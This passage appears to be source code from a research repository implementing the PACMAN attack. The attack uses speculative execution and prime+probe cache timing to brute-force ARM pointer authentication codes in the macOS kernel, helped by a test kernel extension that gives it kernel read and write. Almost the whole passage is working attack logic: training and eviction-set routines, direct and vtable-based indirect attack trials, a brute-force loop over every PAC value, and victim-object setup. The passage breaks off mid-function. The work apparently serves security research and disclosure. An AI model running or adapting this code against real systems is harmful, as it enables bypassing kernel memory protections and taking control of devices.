PACDA for addr 0x{:X} with salt 0x{:X}", addr, salt); 527 | return Err(kret); 528 | } 529 | 530 | return Ok(output_val); 531 | } 532 | 533 | /// Returns the correct AUTDA signature from the kernel. This can ONLY be used for testing! 534 | /// The real attack cannot do this. 535 | pub unsafe fn forge_auth_data(&self, addr: u64, salt: u64) -> Result { 536 | let args : [u64; 2] = [addr, salt]; 537 | let mut output_cnt = 1; 538 | let mut output_val = 1; 539 | 540 | let kret = IOConnectCallScalarMethod( 541 | self.0, 542 | PacmanKitOp::ForgeAuthData as u32, 543 | args.as_ptr(), 544 | 2, 545 | &mut output_val, 546 | &mut output_cnt 547 | ); 548 | 549 | if KERN_SUCCESS != kret { 550 | println!("Couldn't forge AUTDA for addr 0x{:X} with salt 0x{:X}", addr, salt); 551 | return Err(kret); 552 | } 553 | 554 | return Ok(output_val); 555 | } 556 | 557 | /// Returns the correct PACIA signature from the kernel. This can ONLY be used for testing! 558 | /// The real attack will need to use brute force to find this. We only use this method to learn 559 | /// the ground truth for generating plots and tuning the algorithm. 560 | pub unsafe fn forge_sign_inst(&self, addr: u64, salt: u64) -> Result { 561 | let args : [u64; 2] = [addr, salt]; 562 | let mut output_cnt = 1; 563 | let mut output_val = 1; 564 | 565 | let kret = IOConnectCallScalarMethod( 566 | self.0, 567 | PacmanKitOp::ForgeSignInst as u32, 568 | args.as_ptr(), 569 | 2, 570 | &mut output_val, 571 | &mut output_cnt 572 | ); 573 | 574 | if KERN_SUCCESS != kret { 575 | println!("Couldn't forge PACIA for addr 0x{:X} with salt 0x{:X}", addr, salt); 576 | return Err(kret); 577 | } 578 | 579 | return Ok(output_val); 580 | } 581 | 582 | /// Returns the correct AUTIA signature from the kernel. This can ONLY be used for testing! 583 | /// The real attack cannot do this. 584 | pub unsafe fn forge_auth_inst(&self, addr: u64, salt: u64) -> Result { 585 | let args : [u64; 2] = [addr, salt]; 586 | let mut output_cnt = 1; 587 | let mut output_val = 1; 588 | 589 | let kret = IOConnectCallScalarMethod( 590 | self.0, 591 | PacmanKitOp::ForgeAuthInst as u32, 592 | args.as_ptr(), 593 | 2, 594 | &mut output_val, 595 | &mut output_cnt 596 | ); 597 | 598 | if KERN_SUCCESS != kret { 599 | println!("Couldn't forge AUTIA for addr 0x{:X} with salt 0x{:X}", addr, salt); 600 | return Err(kret); 601 | } 602 | 603 | return Ok(output_val); 604 | } 605 | 606 | /// Leak the current proc pointer 607 | pub unsafe fn current_proc(&self) -> Result { 608 | let mut leak_ptr : [u64; 1] = [0; 1]; 609 | let mut output_cnt = 1; 610 | let kret = IOConnectCallScalarMethod( 611 | self.0, 612 | PacmanKitOp::LeakCurProc as u32, 613 | core::ptr::null(), 614 | 0, 615 | leak_ptr.as_mut_ptr(), 616 | &mut output_cnt 617 | ); 618 | 619 | if KERN_SUCCESS != kret { 620 | println!("Couldn't call current_proc() (error {:?})", CStr::from_ptr(mach_error_string(kret))); 621 | return Err(kret); 622 | } 623 | 624 | return Ok(leak_ptr[0]); 625 | } 626 | } 627 | 628 | impl Drop for PacmanKitConnection { 629 | /** 630 | * Clean up our IOKit connection. 631 | */ 632 | fn drop(&mut self) { 633 | println!("Dropping a PacmanKitConnection ({:X}, {:X})", self.0, self.1); 634 | unsafe { 635 | IOServiceClose(self.0); 636 | IOObjectRelease(self.1); 637 | } 638 | } 639 | } 640 | -------------------------------------------------------------------------------- /src/attacks/pacman.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * The PACMAN attack. 3 | */ 4 | use crate::*; 5 | use crate::pac::*; 6 | 7 | pub const DATA_EVSET_SIZE : usize = 12; 8 | pub const DATA_MISS_LATENCY : u64 = 42; // 42 for MSR timers 110 for multithreaded 9 | /// How many times to repeat a given trial? 10 | pub const DATA_NUM_ITERS : usize = 8; 11 | /// How many trials to run? (Each trial == a different PAC) 12 | pub const DATA_NUM_TRIALS : usize = 12; 13 | 14 | /// How many times do we iterate when inspecting the final set? 15 | /// this can be huge since there aren't going to be a ton of them ideally. 16 | pub const DATA_NUM_FINAL_ITERS : usize = 2048; 17 | 18 | /// How far above the first run's average does a run have to be to get marked "significant" for data 19 | pub const DATA_HOW_FAR_ABOVE_AVERAGE : f64 = 4f64; 20 | 21 | pub const INST_EVSET_SIZE : usize = 12; 22 | pub const INST_MISS_LATENCY : u64 = 60; // 70 for MSR timers (blr), 65/60 for MSR timers (blraa), 205 for multithreaded 23 | 24 | /// How many times to repeat a given trial? 25 | pub const INST_NUM_ITERS : usize = 8; 26 | /// How many trials to run? (Each trial == a different PAC) 27 | pub const INST_NUM_TRIALS : usize = 12; 28 | 29 | /// How many times do we iterate when inspecting the final set? 30 | /// this can be huge since there aren't going to be a ton of them ideally. 31 | pub const INST_NUM_FINAL_ITERS : usize = 2048; 32 | 33 | pub const LIMIT_EVSET_SIZE : usize = 512; 34 | 35 | /// How many bytes into the kernel mach-o does the target `ret` live? 36 | // A gadget from IOSCSIArchitectureModelFamily.kext: 0x26a497c 37 | pub const INST_TARGET_OFFSET : u64 = 0x26a497c; // 0x15739C; // 0x15751C; // 0x154088 38 | 39 | /// How far above the first run's average does a run have to be to get marked "significant" for inst 40 | pub const INST_HOW_FAR_ABOVE_AVERAGE : f64 = 4f64; 41 | 42 | #[derive(Copy,Clone,Debug,PartialEq)] 43 | struct DirectTarget{ 44 | // The location of the pointer to forge a PAC for 45 | holder: u64, 46 | 47 | // A known correct value for holder- should point to something other than guess_ptr 48 | train_ptr: u64, 49 | 50 | // Current guess of the correct value for holder 51 | guess_ptr: u64, 52 | } 53 | 54 | #[derive(Copy,Clone,Debug,PartialEq)] 55 | struct IndirectTarget{ 56 | outer_holder: u64, 57 | inner_holder: u64, 58 | 59 | // Both of these are known correctly signed pointers 60 | // train_ptr causes execution to ignore inner_holder, guess_ptr causes execution to evaluate inner_holder 61 | outer_train_ptr: u64, 62 | outer_guess_ptr: u64, 63 | 64 | // Current guess of the correct value for inner_holder 65 | inner_guess_ptr: u64, 66 | } 67 | 68 | /// Direct or indirect? Used for abstracting direct/ indirect attacks into one generic method flavor. 69 | enum PacmanAttackTarget { 70 | Direct(DirectTarget), 71 | Indirect(IndirectTarget), 72 | } 73 | 74 | /** 75 | * Calculate a salt for a given PAC computation. 76 | * 77 | * # Arguments 78 | * * `holder_addr`: The address holding the PAC'd pointer. 79 | * * `salt_const`: The salt constant for a given object. 80 | * 81 | * # Return Value 82 | * Returns the correct 64 bit salt for this given context. 83 | */ 84 | pub unsafe fn get_salt(holder_addr: u64, salt_const: u64) -> u64 { 85 | // Upper 16 bits are the salt_const 86 | // Need to make sure that bit 47 is set correctly too 87 | let addr_unmasked = (holder_addr | PAC_BITMASK) & (!0xFFFF000000000000u64); 88 | return (addr_unmasked | (salt_const << 48u64)); 89 | } 90 | 91 | /** 92 | * Helper method to do the address computation to find the victim object in memory, 93 | * given a IOService that owns an IOUserClient we want to corrupt. 94 | */ 95 | pub unsafe fn find_victim_objects(handle: &PacmanKitConnection) -> (u64, u64, u64, u64) { 96 | let victim_user_client = handle.get_handle_loc().unwrap(); 97 | let victim_object = victim_user_client + pacmankit::PACMANKIT_TO_HELPER; 98 | let victim_vtable = handle.kernel_read(victim_object).unwrap(); 99 | let victim_vtable_entry = handle.kernel_read(victim_vtable).unwrap(); 100 | 101 | return (victim_user_client, victim_object, victim_vtable, victim_vtable_entry); 102 | } 103 | 104 | /** 105 | Run the PACMAN attack on a given pointer and return the access latencies for analysis. 106 | 107 | This can be used on either a data pointer or instruction pointer. 108 | 109 | # Arguments 110 | * `handle`: A PacmanKitConnection handle (only used for kernel write). 111 | * `holder`: The address holding the pointer to forge (will be written into). 112 | * `known_good`: A known good pointer that can be safely used non-speculatively (has correct PAC). 113 | * `guess_value`: The pointer with a guessed PAC we are checking. 114 | * `time_use_fn`: The function to use for timing a pointer's usage. 115 | * `try_speculative`: A closure to trigger a speculative use of the pointer in `holder`. 116 | * `try_nonspeculative`: A closure to try using (for whatever definition of `using` applies 117 | in a given use case)the pointer in `holder` non-speculatively. 118 | * `forge_evset`: An eviction set for the `guess_value` pointer being forged. 119 | * `forge_evset_indexes`: An array of indexes to use to index `forge_evset`. Will be randomized! 120 | * `limit_evset`: An eviction set for the `guess_value` pointer being forged. 121 | * `limit_evset_indexes`: An array of indexes to use to index `limit_evset`. Will be randomized! 122 | # Generics 123 | * `TrySpec`: A closure to try a value speculatively. Can just use `_`. 124 | * `TryNonSpec`: A closure to try a value non-speculatively. Can just use `_`. 125 | * `const` `EVSET_SIZE`: The size of the eviction set. 126 | 127 | # Return Value 128 | Returns the measured latencies (using `time_use_fn`) of the `prime+probe`'d eviction set. 129 | */ 130 | #[inline(always)] 131 | unsafe fn pacman_try_one( 132 | handle: &PacmanKitConnection, 133 | 134 | // Address of the pointer to forge (where the pointer will be saved in memory): 135 | holder: u64, 136 | 137 | // A known good value (can be used non-speculatively) that can be written into holder: 138 | known_good: u64, 139 | 140 | // The pointer we are guessing our PAC is correct for: 141 | guess_value: u64, 142 | 143 | // Generic functions to test the pointer: 144 | time_use_fn: unsafe fn(u64) -> u64, 145 | try_speculative: TrySpec, 146 | try_nonspeculative: TryNonSpec, 147 | 148 | // Eviction sets: 149 | forge_evset: &Vec, 150 | forge_evset_indexes: &mut Vec, 151 | limit_evset: &Vec, 152 | limit_evset_indexes: &mut Vec, 153 | ) -> [u64; EVSET_SIZE] where 154 | TrySpec: Fn(), TryNonSpec: Fn() { 155 | 156 | // 0. Throw off the prefetcher if you want (I found this was unnecessary) 157 | // forge_evset_indexes.shuffle(&mut thread_rng()); 158 | // limit_evset_indexes.shuffle(&mut thread_rng()); 159 | 160 | // 1. Train branch predictor on known good pointer 161 | handle.kernel_write(holder | PAC_BITMASK, known_good); 162 | for i in 0..12 { 163 | try_nonspeculative(); 164 | } 165 | 166 | // 2. Write guess 167 | handle.kernel_write(holder | PAC_BITMASK, guess_value); 168 | 169 | // 3. Evict LIMIT- this is ALWAYS a data access! 170 | for i in 0..limit_evset_indexes.len() { 171 | timer::time_access(limit_evset[limit_evset_indexes[i]]); 172 | } 173 | 174 | // 4. Prime the cache 175 | for i in 0..EVSET_SIZE { 176 | time_use_fn(forge_evset[forge_evset_indexes[i]]); 177 | } 178 | 179 | // 5. Try guess (speculatively) 180 | try_speculative(); 181 | 182 | // 6. Probe (go backwards with .rev() if you want to prevent self-eviction!) 183 | let mut times = [0; EVSET_SIZE]; 184 | for i in (0..EVSET_SIZE) { 185 | times[i] = time_use_fn(forge_evset[forge_evset_indexes[i]]); 186 | } 187 | 188 | // 7. Cleanup nicely 189 | handle.kernel_write(holder | PAC_BITMASK, known_good); 190 | 191 | return times; 192 | } 193 | 194 | /** 195 | * Does one run of a PACMAN trial where the pointer in question can be directly written to for a trial. 196 | * 197 | * This is in contrast to the indirect case where the pointer to test is in a region that 198 | * needs to be swapped (aka a vtable entry). 199 | * 200 | * See `pacman_try_one` and `pacman_differentiate_direct` for documentation on the interfaces exposed by this method. 201 | * This method is intended to be used as a helper routine for bruteforcing/ differentiating on direct gadgets (data or inst). 202 | */ 203 | #[inline(always)] 204 | unsafe fn pacman_direct< 205 | TrySpec, 206 | TryNonSpec, 207 | const NUM_ITERS: usize, 208 | const EVSET_SIZE: usize, 209 | const MISS_LATENCY: u64 210 | > ( 211 | handle: &PacmanKitConnection, 212 | holder: u64, 213 | 214 | // Used to train the branch predictor (non-speculatively!) 215 | train_ptr : u64, 216 | 217 | // Used speculatively as part of the PACMAN attack. Should point to different memory than `train_ptr`. 218 | guess_ptr : u64, 219 | 220 | // Generic functions to test the pointer: 221 | time_use_fn: unsafe fn(u64) -> u64, 222 | try_speculative: TrySpec, 223 | try_nonspeculative: TryNonSpec, 224 | 225 | // Eviction sets: 226 | forge_evset: &Vec, 227 | forge_evset_indexes: &mut Vec, 228 | limit_evset: &Vec, 229 | limit_evset_indexes: &mut Vec, 230 | ) -> [u64; NUM_ITERS] where TrySpec: Fn(), TryNonSpec: Fn() { 231 | let mut samples = [0; NUM_ITERS]; 232 | 233 | for iteration in 0..NUM_ITERS { 234 | // Run a single test case 235 | let mut times = pacman_try_one::<_, _, EVSET_SIZE>( 236 | &handle, 237 | holder, 238 | train_ptr, 239 | guess_ptr, 240 | time_use_fn, 241 | &try_speculative, 242 | &try_nonspeculative, 243 | forge_evset, 244 | forge_evset_indexes, 245 | limit_evset, 246 | limit_evset_indexes, 247 | ); 248 | 249 | // Record the number of misses 250 | // @TODO: Replace samples with an array of buckets for different miss counts 251 | let mut misses = 0; 252 | for i in 0..EVSET_SIZE { 253 | if times[i] > MISS_LATENCY { 254 | misses += 1; 255 | } 256 | } 257 | samples[iteration] = misses; 258 | 259 | // Sometimes it's helpful to print the actual latencies out: 260 | // times.sort(); 261 | // println!("{:?}", times); 262 | } 263 | 264 | return samples; 265 | } 266 | 267 | /** 268 | * Does one run of a PACMAN trial where the pointer in question cannot be directly written to for a trial. 269 | * However, by writing to a different pointer we have a good signature for, we can control whether our guess pointer is evaluated speculatively. 270 | * 271 | * The quintessential example of when this might be useful is for forging vtables- we cannot copy good vtable entries from 272 | * the old vtable to put in our forged vtable as moving a signed pointer invalidates it (due to salts being address dependent). 273 | * 274 | * This becomes an indirect PACMAN gadget once we forge the correct data pointer used to point to our forged vtable. The following happens: 275 | * 276 | * 1. We update the forged vtable with our new guess. 277 | * 2. We swap the old vtable pointer for the forged one we got from a Direct PACMAN gadget. 278 | * 3. We speculatively use our new vtable with our guess entry, passing through the already-bruteforced pointer. 279 | * 280 | * The following diagram explains this: 281 | * 282 | * ```text 283 | * +--------------+ 284 | * +-> | Known Good | <- Train on this 285 | * | +--------------+ 286 | * +--------------+ | 287 | * | Outer Holder | -? Are we training or testing? 288 | * +--------------+ | 289 | * | +--------------+ 290 | * +-> | Inner Holder | <- Test on this 291 | * +--------------+ 292 | * ``` 293 | * 294 | * We load `outer_holder` with the value `outer_train_ptr`, which should cause the outer holder to point to an address 295 | * containing a known good pointer that can be dereferenced. In the context of C++ vtables, this means `outer_train_ptr` 296 | * is the appropriate signed pointer for `outer_holder` that points to the original object vtable. We train like this. 297 | * 298 | * During a test, we swap `outer_holder` for `outer_guess_ptr` which causes the outer holder to point to our guess value. 299 | * This should be a correctly signed pointer for outer holder! (Forge it using `pacman_direct`). In the context of C++ 300 | * vtables, this would be a data pointer we already forged pointing to our fake vtable. 301 | * 302 | * `inner_holder` is the address inside of the new memory region we want to bruteforce a pointer in. We will write our guess 303 | * of the new pointer into `inner_holder`. This guess does not need to be correct as it will only be evaluated speculatively 304 | * of course. `inner_guess_ptr` contains this guess value. In the C++ vtable example, this would point to our code gadget we'd 305 | * like to run, with a PAC guess in the upper bits. 306 | * 307 | * This is in contrast to the direct case where the pointer to test can just be trained on as we have a good pointer for that slot. 308 | * 309 | * See `pacman_try_one` for documentation on the interfaces exposed by this method. 310 | * This method is intended to be used as a helper routine for bruteforcing/ differentiating on indirect gadgets (data or inst). 311 | */ 312 | #[inline(always)] 313 | unsafe fn pacman_indirect< 314 | TrySpec, 315 | TryNonSpec, 316 | const NUM_ITERS: usize, 317 | const EVSET_SIZE: usize, 318 | const MISS_LATENCY: u64 319 | > ( 320 | handle: &PacmanKitConnection, 321 | 322 | // The holders for our two pointers: 323 | outer_holder: u64, 324 | inner_holder: u64, 325 | 326 | // Used to train the branch predictor (non-speculatively!) 327 | outer_train_ptr : u64, 328 | outer_guess_ptr : u64, 329 | 330 | inner_guess_ptr: u64, 331 | 332 | // Generic functions to test the pointer: 333 | time_use_fn: unsafe fn(u64) -> u64, 334 | try_speculative: TrySpec, 335 | try_nonspeculative: TryNonSpec, 336 | 337 | // Eviction sets: 338 | forge_evset: &Vec, 339 | forge_evset_indexes: &mut Vec, 340 | limit_evset: &Vec, 341 | limit_evset_indexes: &mut Vec, 342 | ) -> [u64; NUM_ITERS] where TrySpec: Fn(), TryNonSpec: Fn() { 343 | let mut samples = [0; NUM_ITERS]; 344 | 345 | for iteration in 0..NUM_ITERS { 346 | // Write our guess into the inner holder 347 | handle.kernel_write(inner_holder, inner_guess_ptr); 348 | 349 | // Run a single test case, training with outer_holder set to outer_train_ptr 350 | // And then swapping to outer_guess_ptr when our test arrives (the caller should 351 | // ensure this causes inner_holder to be speculatively used). 352 | let mut times = pacman_try_one::<_, _, EVSET_SIZE>( 353 | &handle, 354 | outer_holder, 355 | outer_train_ptr, 356 | outer_guess_ptr, 357 | time_use_fn, 358 | &try_speculative, 359 | &try_nonspeculative, 360 | forge_evset, 361 | forge_evset_indexes, 362 | limit_evset, 363 | limit_evset_indexes, 364 | ); 365 | 366 | // Record the number of misses 367 | // @TODO: Replace samples with an array of buckets for different miss counts 368 | let mut misses = 0; 369 | for i in 0..EVSET_SIZE { 370 | if times[i] > MISS_LATENCY { 371 | misses += 1; 372 | } 373 | } 374 | samples[iteration] = misses; 375 | 376 | // Sometimes it's helpful to print the actual latencies out: 377 | // times.sort(); 378 | // println!("{:?}", times); 379 | } 380 | 381 | return samples; 382 | } 383 | 384 | /** 385 | Attempt to differentiate a correct PAC vs incorrect PAC. 386 | 387 | This should be used before bruteforcing to ensure the parameters are configured correctly 388 | (incorrect PAC and correct PAC should have clearly different miss patterns produced by this function). 389 | 390 | This function also takes a third pointer (`train_ptr`) that is also correctly signed but points to **different** memory 391 | than either incorrect/ correct ptr. This pointer is used non-speculatively during training! 392 | 393 | This function will run the PACMAN attack on either a correct or incorrect pointer randomly and then print the results of the trial. 394 | The resulting data should produce different distributions for the two cases (correct or incorrect). 395 | 396 | This function works for direct cases (where the pointer being swapped out is the pointer under test) or indirect cases 397 | (where the pointer being tested lives within a new memory region we don't have a train ptr for (aka a vtable situation)). 398 | 399 | # Generic Arguments 400 | * `TrySpec`: A closure to try a value speculatively. Can just use `_`. 401 | * `TryNonSpec`: A closure to try a value non-speculatively. Can just use `_`. 402 | * `NUM_TRIALS`: How many trials to run? Each trial is a grouping of `NUM_ITERS` calls to `pacman_try_one`. Each trial either uses a correct / incorrect pointer. 403 | * `NUM_ITERS`: How many times to test a given pointer (with `pacman_try_one`) before calling it quits? More == more accurate but takes longer. 404 | * `EVSET_SIZE`: How large of an eviction set should we use? 405 | * `MISS_LATENCY`: What timer reading constitutes a cache miss? 406 | 407 | # Arguments 408 | * `handle`: An open PacmanKitConnection handle (passed onto `pacman_try_one` for the arbitrary kernel write primitive). 409 | * `holder`: The address holding the pointer to forge (either `correct_ptr` or `incorrect_ptr` will be written here). `incorrect_ptr` will only be used speculatively. 410 | * `correct_ptr`: The correctly signed pointer to test. 411 | * `incorrect_ptr`: An incorrectly signed pointer to test. 412 | * `time_use_fn`: The function to use for timing a pointer's usage. 413 | * `try_speculative`: A closure to trigger a speculative use of the pointer in `holder`. 414 | * `try_nonspeculative`: A closure to try using (for whatever definition of `using` applies 415 | in a given use case)the pointer in `holder` non-speculatively. 416 | * `forge_evset`: An eviction set for the `guess_value` pointer being forged. 417 | * `forge_evset_indexes`: An array of indexes to use to index `forge_evset`. Will be randomized! 418 | * `limit_evset`: An eviction set for the `guess_value` pointer being forged. 419 | * `limit_evset_indexes`: An array of indexes to use to index `limit_evset`. Will be randomized! 420 | */ 421 | unsafe fn pacman_differentiate< 422 | TrySpec, 423 | TryNonSpec, 424 | const NUM_TRIALS: usize, 425 | const NUM_ITERS: usize, 426 | const EVSET_SIZE: usize, 427 | const MISS_LATENCY: u64 428 | > ( 429 | handle: &PacmanKitConnection, 430 | 431 | // Either direct or indirect- this has all the info on our target object 432 | victim: PacmanAttackTarget, 433 | 434 | // We ignore the guess fields of the victim PacmanAttackTarget and instead defer to these: 435 | correct_ptr: u64, 436 | incorrect_ptr: u64, 437 | 438 | // Generic functions to test the pointer: 439 | time_use_fn: unsafe fn(u64) -> u64, 440 | try_speculative: TrySpec, 441 | try_nonspeculative: TryNonSpec, 442 | 443 | // Eviction sets: 444 | forge_evset: &Vec, 445 | forge_evset_indexes: &mut Vec, 446 | limit_evset: &Vec, 447 | limit_evset_indexes: &mut Vec, 448 | ) where TrySpec: Fn(), TryNonSpec: Fn() { 449 | // results[x][y] contains the number of misses observed for a given trial 450 | // x is the trial number, and y is the subtrial number 451 | // For a given x, we always do either correct or incorrect PAC according to use_correct_pac 452 | let mut results = [[0; NUM_ITERS]; NUM_TRIALS]; 453 | 454 | let mut use_correct_pac = [false; NUM_TRIALS]; 455 | for i in 0..NUM_TRIALS { 456 | use_correct_pac[i] = crandom::rand() % 2 == 0; 457 | } 458 | 459 | // Always ensure we get one false and one true 460 | use_correct_pac[0] = false; 461 | use_correct_pac[1] = true; 462 | 463 | for trial in 0..NUM_TRIALS { 464 | let value_to_use = if use_correct_pac[trial] {correct_ptr} else {incorrect_ptr}; 465 | 466 | let samples = match victim { 467 | PacmanAttackTarget::Direct(target) => 468 | pacman_direct::<_, _, NUM_ITERS, EVSET_SIZE, MISS_LATENCY>( 469 | &handle, 470 | target.holder, 471 | target.train_ptr, 472 | value_to_use, 473 | time_use_fn, 474 | &try_speculative, 475 | &try_nonspeculative, 476 | forge_evset, 477 | forge_evset_indexes, 478 | limit_evset, 479 | limit_evset_indexes 480 | ), 481 | 482 | PacmanAttackTarget::Indirect(target) => 483 | pacman_indirect::<_, _, NUM_ITERS, EVSET_SIZE, MISS_LATENCY>( 484 | &handle, 485 | target.outer_holder, 486 | target.inner_holder, 487 | 488 | target.outer_train_ptr, 489 | target.outer_guess_ptr, 490 | 491 | value_to_use, 492 | 493 | time_use_fn, 494 | &try_speculative, 495 | &try_nonspeculative, 496 | forge_evset, 497 | forge_evset_indexes, 498 | limit_evset, 499 | limit_evset_indexes 500 | ), 501 | }; 502 | 503 | results[trial] = samples; 504 | } 505 | 506 | // Post-process and print out results for graphing/ testing 507 | for i in 0..NUM_TRIALS { 508 | if use_correct_pac[i] { 509 | print!("[*] "); 510 | } 511 | else { 512 | print!("[x] "); 513 | } 514 | 515 | results[i].sort(); 516 | let mut avg : f64 = 0.0; 517 | let mut total : u64 = 0; 518 | for j in 0..results[i].len() { 519 | avg += results[i][j] as f64; 520 | total += results[i][j] 521 | } 522 | avg /= results[i].len() as f64; 523 | let median = results[i][results[i].len() / 2]; 524 | let max = results[i][results[i].len() - 2]; 525 | let min = results[i][2]; 526 | print!("{}, {}, {}, {}, {}\t", min, median, max, avg, total); 527 | println!("{:?}", results[i]); 528 | } 529 | } 530 | 531 | pub const HOW_FAR_ABOVE_AVERAGE : f64 = 4.0f64; 532 | 533 | unsafe fn pacman_bruteforce< 534 | TrySpec, 535 | TryNonSpec, 536 | const NUM_TRIALS: usize, 537 | const NUM_ITERS: usize, 538 | // Number of iterations to run on the potential matches to determine if they are good or not 539 | const NUM_FINAL_ITERS: usize, 540 | const EVSET_SIZE: usize, 541 | const MISS_LATENCY: u64 542 | > ( 543 | handle: &PacmanKitConnection, 544 | 545 | // All the information we need to know about the object under test 546 | victim: PacmanAttackTarget, 547 | 548 | // Generic functions to test the pointer: 549 | time_use_fn: unsafe fn(u64) -> u64, 550 | try_speculative: TrySpec, 551 | try_nonspeculative: TryNonSpec, 552 | 553 | // Eviction sets: 554 | forge_evset: &Vec, 555 | forge_evset_indexes: &mut Vec, 556 | limit_evset: &Vec, 557 | limit_evset_indexes: &mut Vec, 558 | ) -> Option where TrySpec: Fn(), TryNonSpec: Fn() { 559 | 560 | let mut NUM_MISS_SIGNIFICANT : f64 = 0.0; 561 | let mut potential_matches : Vec = Vec::new(); 562 | 563 | // Pull the target out of the victim object 564 | let forge_me = match victim { 565 | PacmanAttackTarget::Direct(target) => target.guess_ptr, 566 | PacmanAttackTarget::Indirect(target) => target.inner_guess_ptr, 567 | }; 568 | 569 | let mut num_trials_complete = 0; 570 | for pac_guess in pac::iterate_pacs(forge_me) { 571 | let value_to_use = pac_guess; 572 | 573 | let mut samples = match victim { 574 | PacmanAttackTarget::Direct(target) => 575 | pacman_direct::<_, _, NUM_ITERS, EVSET_SIZE, MISS_LATENCY>( 576 | &handle, 577 | target.holder, 578 | target.train_ptr, 579 | value_to_use, 580 | time_use_fn, 581 | &try_speculative, 582 | &try_nonspeculative, 583 | forge_evset, 584 | forge_evset_indexes, 585 | limit_evset, 586 | limit_evset_indexes 587 | ), 588 | 589 | PacmanAttackTarget::Indirect(target) => 590 | pacman_indirect::<_, _, NUM_ITERS, EVSET_SIZE, MISS_LATENCY>( 591 | &handle, 592 | target.outer_holder, 593 | target.inner_holder, 594 | 595 | target.outer_train_ptr, 596 | target.outer_guess_ptr, 597 | 598 | value_to_use, 599 | 600 | time_use_fn, 601 | &try_speculative, 602 | &try_nonspeculative, 603 | forge_evset, 604 | forge_evset_indexes, 605 | limit_evset, 606 | limit_evset_indexes 607 | ), 608 | }; 609 | 610 | // Parse results, add to potential_matches, potentially 611 | samples.sort(); 612 | let mut avg : f64 = 0.0; 613 | let mut total : u64 = 0; 614 | for j in 0..samples.len() { 615 | avg += samples[j] as f64; 616 | total += samples[j]; 617 | } 618 | avg /= (samples.len()) as f64; 619 | let median = samples[(samples.len()) / 2]; 620 | let min = samples[2]; 621 | 622 | if num_trials_complete == 0 { 623 | // @TODO: while the observed average isn't great, regenerate eviction set :) 624 | NUM_MISS_SIGNIFICANT = avg + HOW_FAR_ABOVE_AVERAGE; 625 | 626 | if NUM_MISS_SIGNIFICANT > (EVSET_SIZE as f64) { 627 | println!("Asking for an impossibly high average, rounding down"); 628 | NUM_MISS_SIGNIFICANT = EVSET_SIZE as f64; 629 | } 630 | println!("The number to beat is {} misses", NUM_MISS_SIGNIFICANT); 631 | } 632 | 633 | // if pac_guess == correct_signed_new_vtable_ptr || num_trials_complete == 0 { 634 | // print!("{}, {}, {}, {}\t", min, median, avg, total); 635 | // println!("{:?}", samples); 636 | // } 637 | 638 | if (avg >= (NUM_MISS_SIGNIFICANT - (HOW_FAR_ABOVE_AVERAGE as f64 / 2.0)) as f64) { 639 | print!("{}, {}, {}, {}\t", min, median, avg, total); 640 | println!("{:?}", samples); 641 | println!("Found a potential match: 0x{:X}", pac_guess); 642 | potential_matches.push(pac_guess); 643 | } 644 | 645 | num_trials_complete+=1; 646 | 647 | if num_trials_complete % 6556 == 0 { 648 | println!("{}%...", (100 * num_trials_complete) / 65536); 649 | } 650 | } 651 | 652 | println!("Found {} potential matches", potential_matches.len()); 653 | 654 | if potential_matches.len() == 0 { 655 | return None; 656 | } 657 | 658 | // Track the total number of misses of every potential match 659 | // For the ones we think are potentially correct, record the value + total number of misses 660 | // Report the one with the most misses 661 | let mut final_matches : Vec<(u64, u64)> = Vec::new(); 662 | 663 | for potential_match in potential_matches { 664 | let value_to_use = potential_match; 665 | 666 | let mut samples = match victim { 667 | PacmanAttackTarget::Direct(target) => 668 | pacman_direct::<_, _, NUM_FINAL_ITERS, EVSET_SIZE, MISS_LATENCY>( 669 | &handle, 670 | target.holder, 671 | target.train_ptr, 672 | value_to_use, 673 | time_use_fn, 674 | &try_speculative, 675 | &try_nonspeculative, 676 | forge_evset, 677 | forge_evset_indexes, 678 | limit_evset, 679 | limit_evset_indexes 680 | ), 681 | 682 | PacmanAttackTarget::Indirect(target) => 683 | pacman_indirect::<_, _, NUM_FINAL_ITERS, EVSET_SIZE, MISS_LATENCY>( 684 | &handle, 685 | target.outer_holder, 686 | target.inner_holder, 687 | 688 | target.outer_train_ptr, 689 | target.outer_guess_ptr, 690 | 691 | value_to_use, 692 | 693 | time_use_fn, 694 | &try_speculative, 695 | &try_nonspeculative, 696 | forge_evset, 697 | forge_evset_indexes, 698 | limit_evset, 699 | limit_evset_indexes 700 | ), 701 | }; 702 | 703 | // Parse results, break if we found it 704 | samples.sort(); 705 | let mut avg : f64 = 0.0; 706 | let mut total : u64 = 0; 707 | for j in 0..samples.len() { 708 | avg += samples[j] as f64; 709 | total += samples[j]; 710 | } 711 | avg /= (samples.len()) as f64; 712 | let median = samples[(samples.len()) / 2]; 713 | let min = samples[2]; 714 | 715 | print!("{}, {}, {}, {}\t", min, median, avg, total); 716 | // println!("{:?}", samples); 717 | println!("Inspecting potential candidate: 0x{:X}", potential_match); 718 | 719 | if (avg >= NUM_MISS_SIGNIFICANT as f64) { 720 | final_matches.push((total, potential_match)); 721 | } 722 | } 723 | 724 | final_matches.sort_by_key(|k| k.0); 725 | println!("{:?}", final_matches); 726 | 727 | let final_pac = final_matches[final_matches.len() - 1].1; 728 | 729 | println!("Final answer: 0x{:X}", final_pac); 730 | return Some(final_pac); 731 | } 732 | 733 | /** 734 | * Data version of the PACMAN attack. 735 | * 736 | * # Bruteforce Mode 737 | * Returns the correct PAC that we found. 738 | * Note that currently that PAC is useless since the victim handle 739 | * drops when it goes out of scope (when we leave this fn). 740 | */ 741 | pub unsafe fn data_testing(memory_region: &mut [u8], do_bruteforce: bool) { 742 | // Handle is used for interfacing with PacmanKit 743 | let handle = PacmanKitConnection::init().unwrap(); 744 | 745 | // Victim handle gives us a victim IOUserClient to exploit 746 | let victim_handle = PacmanKitConnection::init().unwrap(); 747 | 748 | // Locate target object 749 | let (victim_user_client, victim_object, victim_vtable, victim_vtable_entry) = find_victim_objects(&victim_handle); 750 | 751 | // Setup fake vtable (bring it into the cache) 752 | let new_vtable = handle.kernel_mmap().unwrap() | PAC_BITMASK; 753 | handle.kernel_read(new_vtable).unwrap(); 754 | 755 | // Original value to put in [victim_object]: 756 | let original_signed_vtable_ptr = victim_vtable; 757 | 758 | // Correct PAC we want to find: 759 | let salt_data = get_salt(victim_object | PAC_BITMASK, 0xd986); 760 | let correct_signed_new_vtable_ptr = handle.forge_sign_data(new_vtable | PAC_BITMASK, salt_data).unwrap(); 761 | let correct_pac = pac::extract_pac(correct_signed_new_vtable_ptr); 762 | 763 | // Setup evset for LIMIT 764 | let limit_va = handle.leak_limit_location().unwrap(); 765 | let 